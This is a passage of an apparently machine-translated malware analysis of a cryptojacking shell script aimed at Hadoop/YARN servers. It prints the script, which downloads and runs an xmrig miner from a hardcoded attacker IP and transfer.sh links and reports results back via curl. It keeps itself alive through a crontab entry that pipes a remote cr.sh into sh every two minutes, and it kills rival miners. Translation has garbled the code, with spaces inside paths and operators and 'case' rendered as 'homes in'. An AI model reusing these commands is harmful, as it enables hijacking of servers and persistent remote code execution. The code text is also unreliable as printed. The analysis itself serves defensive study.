This part of the code mainly concerns the data process mining existing, the documents to be cleaned, the processes to be completed, however, we immediately have an important clue, cryptonight (we will see later).
WGET = "wget -O"
if [-s / usr / bin / curl];
then
WGET = "curl -o";
fi
if [-s / usr / bin / wget];
then
WGET = "wget -O";
fi
f2 = "185.222.210.59"
This second part, check and assign some variables, determine if the commands exist curl e wget and if so, assign them to the WGET variable, f2 assigns an IP value.
In fact, f2 is one of the server used to download files related to malicious activity in progress.
downloadIfNeed ()
{
if [! -f / tmp / java]; then
echo "File not found!"
download
fi
if [-x "$ (command -v md5sum)"]
then
sum = $ (md5sum / tmp / java | awk '{print $ 1}')
echo $ sum
$ sum homes in
c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242)
echo "Java OK"
;;
*)
echo "Java wrong"
sizeBefore = $ (du / tmp / java)
if [-s / usr / bin / curl];
then
WGET = "curl -k -o";
fi
if [-s / usr / bin / wget];
then
WGET = "wget --no-check-certificate -O";
fi
$ WGET / tmp / java https: // transfer.sh/ixQBE/zzz
sumAfter = $ (md5sum / tmp / java | awk '{print $ 1}')
if [-s / usr / bin / curl];
then
echo "redownloaded $ sum $ sizeBefore after $ sumAfter" `du / tmp / java`> /tmp/tmp.txt
curl -F "file = @ /tmp/tmp.txt" http: //$f2/re.php
fi
;;
esac
else
echo "No md5sum"
download
fi
}
download () {
f1 = $ (curl 185.222.210.59 / g.php)
if [-z "$ f1"];
then
f1 = $ (wget -q -O - 185.222.210.59 / g.php)
fi
if [`getconf LONG_BIT` =" 64 "]
then
$ WGET / tmp / java http: // $ f1 / xmrig_64
else
$ WGET / tmp / java http: // $ f1 / xmrig_32
fi
}
if [! "$ (ps -fe | grep '/ tmp / java -c /tmp/w.conf' | grep -v grep)"];
then
downloadIfNeed
chmod + x / tmp / java
$ WGET /tmp/w.conf http: //$f2/w.conf
nohup / tmp / java -c /tmp/w.conf> / dev / null 2> & 1 &
Sleep 5
rm -rf /tmp/w.conf
else
echo "Running"
fi
if crontab -l | grep -q "185.222.210.59"
then
echo "Cron exists"
else
echo "Cron not found"
LDR = "wget -q -O -"
if [-s / usr / bin / curl];
then
LDR = "curl";
fi
if [-s / usr / bin / wget];
then
LDR = "wget -q -O -";
fi
(crontab -l 2> / dev / null; echo "* / 2 * * * * $ LDR http: // 185.222.210.59/cr.sh | sh> / dev / null 2> & 1") | crontab -
fi
This third part of the code mainly determines if / tmp / java is a file that exists and can be written, then determine if the MD5 value matches one of the MD5 values present in the code (we would see later the two hash fillet). in script, the LDR variable is assigned. This variable is mainly used to download the directory for storing programs mining and other types, using the wget or curl commands, depending on whether a command is present in the host system. This part of the code is the core of the code, download if necessary (with the downloadIfNeed method) and extracts, in the / tmp directory renominado in java the executable for the date mining (checking thanks to getconf LONG_BIT if the executable must be in 32 or 64 bit), download the configuration file w.conf, add execution permissions to the program mining and then executes the nohup command background mining (nohup it is a command that ignores the SIGHUP signal, in order to allow the continuation of the execution even in the event of a disconnection from the terminal, or the termination of the terminal emulator).
Program and delete the configuration file, then check the tasks in crontab, if there is no matching task, it will download the task to run the script "* / 2 * * * * $ LDR http: // 185.222.210.59/cr .sh | sh> / dev / null 2> & 1 "added to it, where $ LDR is wget -q -O - or curl (also mentioned above), the task runs once every two minutes (as shown in the figure, showing the options of the fields that specify the frequency of the command execution).
Lo script contains download methods for several nested calls. The input method is downloadIfNeed. By specifying better, the main function of this method is to check MD5 of the date program mining existing, if it can not be verified or the file does not exist, directly call the download method (according to method found in the script) to download the program mining If the file exists but MD5 does not match correctly, call the download method. After checking again, if the verification fails, please try to download the mining program from another download channel https: // transfer.sh/WoGXx/zzz and verify again. Finally, relevant results are reported to the target server's re.php $ f2.
If it exists, the replication name is java.
The download () method judges that the system downloads the corresponding version of the program mining from the following web resource: http: // 185.222.210.59/g.php.
The resource returns another IP address to download the main executable, once the download is complete, it is checked again and the copy is renamed to ppc.
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
crontab -l | sed '/ logo4 / d' | crontab -
crontab -l | sed '/ logo9 / d' | crontab -
crontab -l | sed '/ logo0 / d' | crontab -
In the last part of the script there are some processes, files, crontab cleaning processes, use of pkill to terminate the process that satisfies the conditions and eliminate some crontab activity.
9 Open Source Information
10 https:// community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-an.html oppure https:// stackoverflow.com/questions/50520658/its-seem-that-the-yarn-is-infected-by-trojan-even-if-i-reinstall-my-computer
11 Remote Procedure Call, is a general mechanism for managing applications client-server.
12 Advanced and Persistent Threath, type of attacks generally carried out by state-based organizations.
(photo: US DoD)